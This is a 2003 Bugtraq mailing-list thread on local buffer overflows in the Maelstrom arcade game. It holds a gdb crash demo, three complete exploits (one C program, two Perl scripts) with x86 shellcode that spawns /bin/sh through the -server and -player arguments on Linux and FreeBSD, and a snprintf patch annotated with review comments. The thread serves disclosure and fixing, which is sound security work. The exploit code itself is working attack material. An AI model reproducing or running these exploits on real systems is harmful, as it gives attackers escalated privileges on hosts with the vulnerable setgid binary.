101923 2003-05-19 23:09 /44 rader/ Luca Ercoli <luca.ercoli@inwind.it>
Importerad: 2003-05-19 23:09 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4941>
Ärende: Maelstrom Buffer Overflow
------------------------------------------------------------
Maelstrom is an arcade game. There is a buffer overflow vulnerability
in Maelstrom which allows a local attacker to execute arbitrary code.
Vulnerable systems: Maelstrom 3.0.6
Maelstrom 3.0.5
Example:
[lucae@linux]$ gdb /usr/bin/Maelstrom
GNU gdb 5.2.1-2mdk (Mandrake Linux) Copyright 2002 Free Software
Foundation, Inc. GDB is free software, covered by the GNU General
Public License, and you are welcome to change it and/or distribute
copies of it under certain conditions. Type "show copying" to see
the conditions. There is absolutely no warranty for GDB. Type "show
warranty" for details. This GDB was configured as
"i586-mandrake-linux-gnu"...
(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
(gdb) r
Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD"
x 9999'` Couldn't resolve host name for ABCDABC......ABCD
Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()
(gdb) Quit
Note: -rwxr-sr-x 1 root games 171568 19 feb
03:38 /usr/bin/Maelstrom in Linux Professional 9.0
Luca Ercoli luca.ercoli@inwind.it
(101923) /Luca Ercoli <luca.ercoli@inwind.it>/(Ombruten)
102007 2003-05-20 17:40 /102 rader/ Claes Nyberg <md0claes@mdstud.chalmers.se>
Importerad: 2003-05-20 17:40 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4948>
Kommentar till text 101923 av Luca Ercoli <luca.ercoli@inwind.it>
Ärende: Maelstrom exploit
------------------------------------------------------------
-- begin maelstromxp.c
/*
* Maelstrom exploit By CMN <cmn@darklab.org>
*
* Tested on
*
* Maelstrom v1.4.3 (GPL version 3.0.6)
* from Maelstrom-3.0.6-1.i386.rpm
*
* Maelstrom v1.4.3 (Linux version 3.0.3)
* from Gentoo port
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/*
 * Build-time parameters of the proof-of-concept: the binary it runs, the
 * length of the -server argument it builds, the x86 NOP filler byte, and the
 * default amount subtracted from the stack address computed in main().
 */
#define TARGET "/usr/bin/Maelstrom"
#define BUFSIZE 8179
#define NOP 0x90
#define OFFSET 100
/*
 * Payload: 32-bit x86 machine code that makes Linux system calls through
 * int $0x80; the inline disassembly is the author's. Read by the syscall
 * number loaded into %al, the sequence is geteuid (0x31) -> setreuid (0x46),
 * getegid (0x32) -> setregid (0x47), execve (0x0b) of "/bin//sh", then
 * exit (1).
 *
 * Defender's reading: the setreuid/setregid pair copies the effective ids of
 * the exploited process onto its real ids before the shell starts. The
 * advisory in this thread lists the binary as -rwxr-sr-x root:games, so the
 * impact shown is a shell holding the "games" group rather than root. A
 * Maelstrom process that execs /bin/sh is the observable symptom.
 */
static char linux_code[] =
"\xb9\xff\xff\xff\xff" /* movl $-1, %ecx */
"\x31\xc0" /* xorl %eax, %eax */
"\xb0\x31" /* movb $0x31, %al */
"\xcd\x80" /* int $0x80 */
"\x89\xc3" /* movl %eax, %ebx */
"\xb0\x46" /* movb $0x46, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\xb0\x32" /* movb $0x32, %al */
"\xcd\x80" /* int $0x80 */
"\x89\xc3" /* movl %eax, %ebx */
"\xb0\x47" /* movb $0x47, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xorl %edx, %edx */
"\x52" /* pushl %edx */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp, %ebx */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp, %ecx */
"\xb0\x0b" /* movb $0xb, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\x40" /* inc %eax */
"\xcd\x80"; /* int $0x80 */
/*
 * Proof-of-concept driver for the -server overflow reported at the top of
 * this thread. It assembles one BUFSIZE-byte argument of the form
 * "2@<filler>", with linux_code and four copies of a stack address at the
 * tail, and runs the target with that argument after -server.
 *
 * Options, as listed in the usage text: -t target, -o offset.
 * On success execlp() does not return; on failure the error is printed and
 * the process exits with EXIT_FAILURE.
 *
 * Context for defenders: the advisory shows the binary installed setgid
 * games, which is what turns a local overflow in argument handling into a
 * privilege boundary; the snprintf patch later in the thread is the
 * proposed fix.
 */
int
main(int argc, char *argv[])
{
/* ret starts out as the address of this local variable, i.e. a location on
 * the current stack, narrowed to int */
int ret = (u_long)(&ret);
u_char *target = TARGET;
/* BUFSIZE bytes of argument plus the terminating NUL */
u_char buf[BUFSIZE+1];
long offset = 0;
int i;
/* fill with NOP bytes, terminate, then stamp the "2@" prefix that the
 * advisory's example argument also uses */
memset(buf, NOP, BUFSIZE);
buf[BUFSIZE] = '\0';
buf[0] = '2';
buf[1] = '@';
/* the payload sits immediately before the last 4*sizeof(ret) bytes */
memcpy(&buf[BUFSIZE-(strlen(linux_code)+4*sizeof(ret))],
linux_code, strlen(linux_code));
while ( (i = getopt(argc, argv, "t:o:")) != -1) {
switch(i) {
case 't':
target = optarg;
case 'o':
offset = strtol(optarg, NULL, 0);
break;
default:
printf("\nUsage: %s [-t target ] [-o offset]\n\n", argv[0]);
exit(EXIT_FAILURE);
}
}
/* an offset of zero (the initial value) selects OFFSET */
ret -= offset ? offset : OFFSET;
/* the adjusted address is written into the final four ret-sized slots */
memcpy(&buf[BUFSIZE-(sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(2*sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(3*sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(4*sizeof(ret))], &ret, sizeof(ret));
printf("Using address 0x%08lx\n", ret);
printf("Target is '%s'\n", target);
/* argv[0] of the new process is the literal "CMN" */
execlp(target, "CMN", "-server", buf, (char *)NULL);
/* reached only if execlp() failed */
perror("execle()");
exit(EXIT_FAILURE);
}
-- end maelstromxp.c
(102007) /Claes Nyberg <md0claes@mdstud.chalmers.se>/
102028 2003-05-20 19:14 /13 rader/ akcess . <akcss@linuxmail.org>
Importerad: 2003-05-20 19:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4952>
Ärende: Maelstrom Local Buffer Overflow Exploit
------------------------------------------------------------
Local exploit for /usr/bin/Maelstrom due to insufficient bounds
checking of the -player cmd line arg.
See attached proof-of-concept exploit.
-akcess
(102028) /akcess . <akcss@linuxmail.org>/-(Ombruten)
Bilaga (application/octet-stream) i text 102029
102029 2003-05-20 19:14 /33 rader/ akcess . <akcss@linuxmail.org>
Bilagans filnamn: "maelx.pl"
Importerad: 2003-05-20 19:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4953>
Bilaga (text/plain) till text 102028
Ärende: Bilaga (maelx.pl) till: Maelstrom Local Buffer Overflow Exploit
------------------------------------------------------------
#!/usr/bin/perl -w
#
# /usr/bin/Maelstrom -player Local Buffer Overflow Exploit by akcess
#
# This code exploits the -player overflow which i discovered after
# reading the initial advisory detailing the -server overflow by
# Luca Ercoli
#
# [ akcess@linuxmail.org ] - *21/05/03*
#
# Review notes:
#   - This is a second input path (-player) into the same binary as the
#     -server report earlier in the thread, so a fix has to cover both
#     arguments.
#   - The payload is handed to the child through the environment variable
#     SC; the command-line argument holds only filler bytes and one packed
#     32-bit address ($ret + $offset).
#   - $ret is a hard-coded address, presumably specific to the author's
#     system.
$sc = "\x90"x1500; # write stdout "akcess wuz here..."; execve
/bin/sh; exit;
$sc .=
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x2e\x2e\x20\x0a\x68\x65\x72\x65";
$sc .=
"\x2e\x68\x75\x7a\x20\x68\x68\x73\x73\x20\x77\x68\x61\x6b\x63\x65";
$sc .=
"\x89\xe1\xb2\x18\xb0\x04\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68";
$sc .=
"\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24";
$sc .= "\xb0\x0b\xcd\x80";
# export the payload to the process started by exec() below
$ENV{'SC'} = $sc;
$offset = "0";
$ret = 0xbffff9ee;
# 8173 filler bytes, followed by the packed address
for ($i = 0; $i < (8177 - 4); $i++) {
$buf .= "\x90";
}
$buf .= pack('l', ($ret + $offset));
print("Using return address: 0x", sprintf('%lx',($ret +
$offset)),"\n");
exec("/usr/bin/Maelstrom -player 1\@'$buf'");
(102029) /akcess . <akcss@linuxmail.org>/-(Ombruten)
102049 2003-05-20 22:42 /28 rader/ Knud Erik Højgaard <kain@ircop.dk>
Importerad: 2003-05-20 22:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: full-disclosure@lists.netsys.com
Mottagare: Bugtraq (import) <4958>
Ärende: Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition
------------------------------------------------------------
hey, it's maelort.pl.
#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug
found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE.
# maelstrom-3.0.5 Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists ==
flooded mbox #¤%
# Review notes:
#   - Same -server argument as the original advisory, here against the
#     FreeBSD port (maelstrom-3.0.5); the author describes the impact as
#     gid games.
#   - The payload is placed in the environment variable EGG, padded with
#     NOP bytes to $len bytes in total; the argument is "1@A" followed by
#     255 copies of the packed address.
$len = 1000;
$ret = pack("l",0xbfbffb7f);
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
# NOP filler first, payload last, so the variable is exactly $len bytes
for ($i = 0; $i < $len - length($shellcode); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;
exec("/usr/X11R6/bin/Maelstrom -server $cakeman");
--
kokanin
(102049) /Knud Erik Højgaard <kain@ircop.dk>/-------
102197 2003-05-21 18:54 /394 rader/ Andrew Church <achurch@achurch.org>
Importerad: 2003-05-21 18:54 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4965>
Kommentar till text 102049 av Knud Erik Højgaard <kain@ircop.dk>
Ärende: Maelstrom bugfix (was Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition)
------------------------------------------------------------
Am I the only one who thinks it odd to see so many exploits but
no fixes for the problem?
--Andrew Church
achurch@achurch.org
http://achurch.org/
---------------------------------------------------------------------------
[NOTE: this patch is just a methodical replacement of sprintf() on
fixed-size buffers with snprintf(), and includes some places, like
"%d" into a 128-byte buffer, that obviously won't overflow--but hey,
paranoia is good for you.]
diff -ur Maelstrom-3.0.6-orig/controls.cpp
Maelstrom-3.0.6/controls.cpp
--- Maelstrom-3.0.6-orig/controls.cpp 2001-03-25 03:04:28 +0900
+++ Maelstrom-3.0.6/controls.cpp 2003-05-21 11:25:53 +0900
@@ -83,7 +83,7 @@
if ( fname ) {
*fname = datafile;
}
- sprintf(datafile, "%s"DIR_SEP"%s", home, MAELSTROM_DATA);
+ snprintf(datafile, sizeof(datafile), "%s"DIR_SEP"%s", home, MAELSTROM_DATA);
if ( (data=fopen(datafile, mode)) == NULL )
return(NULL);
return(data);
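Review bot: `sizeof(datafile)` is the buffer size only if `datafile` is declared as a char array in this scope; its declaration is outside the hunk, and the same assumption applies to every `sizeof(...)` bound added in this patch whose declaration is not visible (for example `errbuf`, `file`, `text`, `numbuf`, `message`, `netbuf`). If any of them is a `char *`, the bound silently becomes the pointer size. Separately, snprintf() truncates without this code noticing, so a long `home` makes the fopen() that follows act on a shortened path; keeping the return value in `n` and adding `if (n < 0 || (size_t)n >= sizeof(datafile)) return(NULL);` would refuse instead. The enclosing function starts and ends outside the hunk.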
diff -ur Maelstrom-3.0.6-orig/dialog.h Maelstrom-3.0.6/dialog.h
--- Maelstrom-3.0.6-orig/dialog.h 2001-07-21 00:08:10 +0900
+++ Maelstrom-3.0.6/dialog.h 2003-05-21 11:24:33 +0900
@@ -92,7 +92,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
@@ -878,7 +878,7 @@
if ( entry->text ) {
Fontserv->FreeText(entry->text);
}
- sprintf(buf, "%d", *entry->variable);
+ snprintf(buf, sizeof(buf), "%d", *entry->variable);
if ( entry->hilite ) {
clear = Fg;
diff -ur Maelstrom-3.0.6-orig/load.cpp Maelstrom-3.0.6/load.cpp
--- Maelstrom-3.0.6-orig/load.cpp 2000-02-15 11:47:39 +0900
+++ Maelstrom-3.0.6/load.cpp 2003-05-21 11:26:18 +0900
@@ -81,7 +81,7 @@
SDL_Surface *bmp, *title;
/* Open the title file -- we know its colormap is our global one */
- sprintf(file, "Images"DIR_SEP"Maelstrom_Titles#%d.bmp",
title_id);
+ snprintf(file, sizeof(file), "Images"DIR_SEP"Maelstrom_Titles#%d.bmp", title_id);
bmp = SDL_LoadBMP(path.Path(file));
if ( bmp == NULL ) {
return(NULL);
@@ -103,7 +103,7 @@
Uint16 w, h;
/* Open the cicn sprite file.. */
- sprintf(file, "Images"DIR_SEP"Maelstrom_Icon#%hd.cicn",
cicn_id);
+ snprintf(file, sizeof(file), "Images"DIR_SEP"Maelstrom_Icon#%hd.cicn", cicn_id);
if ( (cicn_src=SDL_RWFromFile(path.Path(file), "r")) == NULL ) {
error("GetCIcon(%hd): Can't open CICN %s: ",
cicn_id, path.Path(file));
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_FontServ.h
Maelstrom-3.0.6/maclib/Mac_FontServ.h
--- Maelstrom-3.0.6-orig/maclib/Mac_FontServ.h 1999-12-03 02:15:33
+0900
+++ Maelstrom-3.0.6/maclib/Mac_FontServ.h 2003-05-21 11:28:43 +0900
@@ -135,7 +135,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Resource.h Maelstrom-3.0.6/maclib/Mac_Resource.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Resource.h 1999-12-04 03:01:47
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Resource.h 2003-05-21 11:28:35 +0900
@@ -96,7 +96,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Sound.h Maelstrom-3.0.6/maclib/Mac_Sound.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Sound.h 2002-10-20 11:53:34
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Sound.h 2003-05-21 11:28:27 +0900
@@ -199,7 +199,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Wave.h Maelstrom-3.0.6/maclib/Mac_Wave.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Wave.h 2000-01-26 01:44:10
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Wave.h 2003-05-21 11:28:20 +0900
@@ -108,7 +108,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/macres.cpp Maelstrom-3.0.6/maclib/macres.cpp
--- Maelstrom-3.0.6-orig/maclib/macres.cpp 2000-01-26 01:44:20
+0900
+++ Maelstrom-3.0.6/maclib/macres.cpp 2003-05-21 11:30:01 +0900
@@ -58,8 +58,8 @@
ids[j], res->ResourceName(types[i], ids[j]));
if ( argv[2] ) {
char path[23];
- sprintf(path,"%s/%s:%hu", argv[2],
- types[i], ids[j]);
+ snprintf(path, sizeof(path), "%s/%s:%hu",
+ argv[2], types[i], ids[j]);
FILE *output;
Mac_ResData *D;
if ( (output=fopen(path, "w")) !=
NULL ) {
diff -ur Maelstrom-3.0.6-orig/maclib/snd2wav.cpp
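Review bot: `path` is only 23 bytes, so with the new bound any longer combination of `argv[2]`, type and id is cut short, and the `fopen(path, "w")` that follows creates or overwrites a file with a different name from the one requested. The snprintf() result should be checked and the entry skipped or reported on truncation, e.g. `int n = snprintf(path, sizeof(path), ...);` followed by `if (n < 0 || (size_t)n >= sizeof(path)) continue;`. Sizing `path` from the lengths of its parts would remove the limit altogether. The loop body continues outside the hunk, so whether `continue` is the right exit has to be confirmed there.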
Maelstrom-3.0.6/maclib/snd2wav.cpp
--- Maelstrom-3.0.6-orig/maclib/snd2wav.cpp 2001-03-28 12:54:50
+0900
+++ Maelstrom-3.0.6/maclib/snd2wav.cpp 2003-05-21 11:29:23 +0900
@@ -82,7 +82,7 @@
continue;
}
wave.Load(snd, rate);
- sprintf(wavname, "snd_%d.wav", ids[i]);
+ snprintf(wavname, sizeof(wavname), "snd_%d.wav", ids[i]);
wave.Save(wavname);
}
delete macx;
diff -ur Maelstrom-3.0.6-orig/main.cpp Maelstrom-3.0.6/main.cpp
--- Maelstrom-3.0.6-orig/main.cpp 2002-10-20 11:53:32 +0900
+++ Maelstrom-3.0.6/main.cpp 2003-05-21 11:27:02 +0900
@@ -445,7 +445,7 @@
DrawText(xOff+309-7, yOff+240-6, text, geneva, STYLE_BOLD,
0x00, 0x00, 0x00);
}
- sprintf(text, "%d", gSoundLevel);
+ snprintf(text, sizeof(text), "%d", gSoundLevel);
DrawText(xOff+309-7, yOff+240-6, text, geneva, STYLE_BOLD,
30000>>8, 30000>>8, 0xFF);
screen->Update();
@@ -547,11 +547,11 @@
}
DrawText(xOff+5, botDiv+42+(index*18), hScores[index].name,
font, STYLE_BOLD, R,
G, B);
- sprintf(buffer, "%u", hScores[index].score);
+ snprintf(buffer, sizeof(buffer), "%u", hScores[index].score);
sw = fontserv->TextWidth(buffer, font, STYLE_BOLD);
DrawText(sRt-sw, botDiv+42+(index*18), buffer,
font, STYLE_BOLD, R,
G, B);
- sprintf(buffer, "%u", hScores[index].wave);
+ snprintf(buffer, sizeof(buffer), "%u", hScores[index].wave);
sw = fontserv->TextWidth(buffer, font, STYLE_BOLD);
DrawText(wRt-sw, botDiv+42+(index*18), buffer,
font, STYLE_BOLD, R, G, B);
@@ -560,7 +560,7 @@
DrawText(xOff+5, botDiv+46+(10*18)+3, "Last Score: ",
bigfont, STYLE_NORM, 0xFF,
0xFF, 0xFF);
- sprintf(buffer, "%d", GetScore());
+ snprintf(buffer, sizeof(buffer), "%d", GetScore());
sw = fontserv->TextWidth("Last Score: ", bigfont, STYLE_NORM);
DrawText(xOff+5+sw, botDiv+46+(index*18)+3, buffer,
bigfont, STYLE_NORM, 0xFF,
0xFF, 0xFF);
diff -ur Maelstrom-3.0.6-orig/myerror.cpp
Maelstrom-3.0.6/myerror.cpp
--- Maelstrom-3.0.6-orig/myerror.cpp 1998-07-14 10:50:17 +0900
+++ Maelstrom-3.0.6/myerror.cpp 2003-05-21 11:23:33 +0900
@@ -16,7 +16,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(mesg, fmt, ap);
+ vsnprintf(mesg, sizeof(mesg), fmt, ap);
fputs(mesg, stderr);
va_end(ap);
}
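Review bot: A comment is missing here that ties this bound to the reported crash: in the gdb transcript at the top of the thread the "Couldn't resolve host name for ..." text is printed just before the fault, which suggests (it cannot be proven from the hunk) that the overflow was in a message formatter like this one. Something like `/* arguments may carry command-line text of any length; output is truncated to sizeof(mesg) */` above the call would record why the bound matters. The patch replaces only sprintf/vsprintf, so the -player case reported separately in the thread cannot be confirmed fixed from these hunks, and other unbounded copies (strcpy and similar) need their own audit. The declaration of `mesg` and the function signature are outside the hunk.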
@@ -27,7 +27,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(mesg, fmt, ap);
+ vsnprintf(mesg, sizeof(mesg), fmt, ap);
fputs(mesg, stdout);
va_end(ap);
}
@@ -37,7 +37,7 @@
char buffer[BUFSIZ];
if ( *msg ) {
- sprintf(buffer, "%s: %s\n", msg, strerror(errno));
+ snprintf(buffer, sizeof(buffer), "%s: %s\n", msg, strerror(errno));
error(buffer);
} else
error((char *)strerror(errno));
diff -ur
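Review bot: `error(buffer)` still passes already-formatted text as the format string, so any `%` in `msg` is interpreted a second time by the formatter it is handed to (presumably the vsnprintf() call patched in the first hunk of this file); the patch bounds the write but leaves this in place. The call should be `error("%s", buffer);`, and the else branch likewise `error("%s", strerror(errno));`, which also removes the cast. Whether `msg` can carry user-supplied text depends on callers outside this hunk, but the fixed format string costs nothing.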
Maelstrom-3.0.6-orig/netlogic/game.cpp
Maelstrom-3.0.6/netlogic/game.cpp
--- Maelstrom-3.0.6-orig/netlogic/game.cpp 2001-07-23 11:24:03
+0900
+++ Maelstrom-3.0.6/netlogic/game.cpp 2003-05-21 11:33:19 +0900
@@ -232,7 +232,7 @@
lastDisplayed = gDisplayed;
screen->FillRect(0, 0, SCREEN_WIDTH, 12,
ourBlack);
- sprintf(caption,
+ snprintf(caption, sizeof(caption),
"You are player %d --- displaying player %d",
gOurPlayer+1, gDisplayed+1);
DrawText(SPRITES_WIDTH, 11, caption, geneva,
@@ -357,7 +357,7 @@
/* -- Erase old and draw new score */
screen->FillRect(45, gStatusLine+1,
score_width, text_height,
ourBlack);
- sprintf(numbuf, "%d", Score);
+ snprintf(numbuf, sizeof(numbuf), "%d", Score);
score_width = DrawText(45, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -380,7 +380,7 @@
if (lastWave != gWave) {
screen->FillRect(255, gStatusLine+1,
wave_width, text_height,
ourBlack);
- sprintf(numbuf, "%d", gWave);
+ snprintf(numbuf, sizeof(numbuf), "%d", gWave);
wave_width = DrawText(255, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -391,7 +391,7 @@
if (lastLives != Lives) {
screen->FillRect(319, gStatusLine+1,
lives_width, text_height,
ourBlack);
- sprintf(numbuf, "%-3.1d", Lives);
+ snprintf(numbuf, sizeof(numbuf), "%-3.1d", Lives);
lives_width = DrawText(319, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -402,7 +402,7 @@
if (lastBonus != Bonus) {
screen->FillRect(384, gStatusLine+1,
bonus_width, text_height,
ourBlack);
- sprintf(numbuf, "%-7.1d", Bonus);
+ snprintf(numbuf, sizeof(numbuf), "%-7.1d", Bonus);
bonus_width = DrawText(384, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -414,7 +414,7 @@
if (lastFrags != Frags) {
screen->FillRect(fragoff, gStatusLine+1,
frags_width, text_height,
ourBlack);
- sprintf(numbuf, "%-3.1d", Frags);
+ snprintf(numbuf, sizeof(numbuf), "%-3.1d", Frags);
frags_width = DrawText(fragoff, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -747,10 +747,11 @@
for ( i=0; i<gNumPlayers; ++i ) {
char buffer[BUFSIZ], num1[12], num2[12];
- sprintf(num1, "%7.1d", final[i].Score);
- sprintf(num2, "%3.1d", final[i].Frags);
- sprintf(buffer, "Player %d: %-.7s Points, %-.3s Frags",
- final[i].Player, num1, num2);
+ snprintf(num1, sizeof(num1), "%7.1d", final[i].Score);
+ snprintf(num2, sizeof(num2), "%3.1d", final[i].Frags);
+ snprintf(buffer, sizeof(buffer),
+ "Player %d: %-.7s Points, %-.3s Frags",
+ final[i].Player, num1, num2);
DrawText(160, 380+i*newyork_height, buffer,
newyork, STYLE_NORM, 30000>>8, 30000>>8, 0xFF);
}
@@ -898,7 +899,7 @@
/* -- Draw the wave completed message */
- sprintf(numbuf, "Wave %d completed.", gWave);
+ snprintf(numbuf, sizeof(numbuf), "Wave %d completed.", gWave);
sw = fontserv->TextWidth(numbuf, geneva, STYLE_BOLD);
x = (SCREEN_WIDTH - sw) / 2;
DrawText(x, 150, numbuf, geneva, STYLE_BOLD, 0xFF, 0xFF, 0x00);
@@ -935,7 +936,7 @@
if (OurShip->GetBonusMult() != 1) {
SDL_Surface *sprite;
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
DrawText(x, 200, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
x += 75;
@@ -951,10 +952,10 @@
Delay(SOUND_DELAY);
sound->PlaySound(gFunk, 5);
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
bonus_width = DrawText(x, 200, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF,
0xFF);
- sprintf(numbuf, "%-5.1d", OurShip->GetScore());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetScore());
score_width = DrawText(xt, 220, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
screen->Update();
@@ -997,12 +998,12 @@
screen->FillRect(x, 200-text_height+2,
bonus_width, text_height,
ourBlack);
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
bonus_width = DrawText(x, 200, numbuf,
geneva, STYLE_BOLD, 0xFF, 0xFF, 0xFF);
screen->FillRect(xt, 220-text_height+2,
score_width, text_height,
ourBlack);
- sprintf(numbuf, "%-5.1d", OurShip->GetScore());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetScore());
score_width = DrawText(xt, 220, numbuf,
geneva, STYLE_BOLD, 0xFF, 0xFF, 0xFF);
@@ -1015,7 +1016,7 @@
HandleEvents(10);
/* -- Draw the "next wave" message */
- sprintf(numbuf, "Prepare for Wave %d...", gWave+1);
+ snprintf(numbuf, sizeof(numbuf), "Prepare for Wave %d...", gWave+1);
sw = fontserv->TextWidth(numbuf, geneva, STYLE_BOLD);
x = (SCREEN_WIDTH - sw)/2;
DrawText(x, 259, numbuf, geneva, STYLE_BOLD, 0xFF, 0xFF,
0x00);
diff -ur Maelstrom-3.0.6-orig/netlogic/netplay.cpp
Maelstrom-3.0.6/netlogic/netplay.cpp
--- Maelstrom-3.0.6-orig/netlogic/netplay.cpp 2002-10-20 13:11:52
+0900
+++ Maelstrom-3.0.6/netlogic/netplay.cpp 2003-05-21 11:31:43 +0900
@@ -670,7 +670,9 @@
strcpy(message, "Waiting for players:");
for ( i=0; i<gNumPlayers; ++i ) {
if ( ! acked[i] )
- sprintf(&message[strlen(message)], " %d", i+1);
+ snprintf(&message[strlen(message)],
+ sizeof(message)-strlen(message),
+ " %d", i+1);
}
Message(message);
@@ -725,7 +727,7 @@
/* Check the player... */
if ( (i != gOurPlayer) && (netbuf[1] == gOurPlayer) ) {
/* Print message, sleep 3 seconds absolutely */
- sprintf(message,
+ snprintf(message, sizeof(message),
"Error: Another player (%d) thinks they are player 1!\r\n", i+1);
ErrorMessage(message);
/* Suck up retransmission packets */
diff -ur Maelstrom-3.0.6-orig/netscore.cpp Maelstrom-3.0.6/netscore.cpp
--- Maelstrom-3.0.6-orig/netscore.cpp 2001-07-23 12:25:17 +0900
+++ Maelstrom-3.0.6/netscore.cpp 2003-05-21 11:27:18 +0900
@@ -59,7 +59,7 @@
/* Send the scores */
crc = get_checksum(key, KEY_LEN);
- sprintf(netbuf, SCOREFMT, crc, high.name, high.score,
high.wave);
+ snprintf(netbuf, sizeof(netbuf), SCOREFMT, crc, high.name, high.score, high.wave);
SDLNet_TCP_Send(remote, netbuf, strlen(netbuf));
n = SDLNet_TCP_Recv(remote, netbuf, 1024);
if ( n > 0 ) {
diff -ur
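Review bot: The `SDLNet_TCP_Recv(remote, netbuf, 1024)` call two lines below the change still uses the literal `1024` rather than the buffer's size, so the patch bounds the outgoing write into `netbuf` but not the incoming one. If `netbuf` is smaller than 1024 bytes the remote end can overrun it, and if it is exactly 1024 there is no room for a terminator should later code treat the reply as a string; `SDLNet_TCP_Recv(remote, netbuf, sizeof(netbuf)-1)` with `netbuf[n] = '\0';` inside the `n > 0` branch covers both. The declaration of `netbuf` and the code that consumes the reply are outside the hunk, so this needs confirming there.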
Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.cpp
Maelstrom-3.0.6/screenlib/SDL_FrameBuf.cpp
--- Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.cpp 2001-07-23
06:03:13 +0900
+++ Maelstrom-3.0.6/screenlib/SDL_FrameBuf.cpp 2003-05-21 11:31:01 +0900
@@ -628,7 +628,7 @@
found = 0;
for ( which=0; !found; ++which ) {
- sprintf(file, "%s%d.bmp", prefix, which);
+ snprintf(file, sizeof(file), "%s%d.bmp", prefix, which);
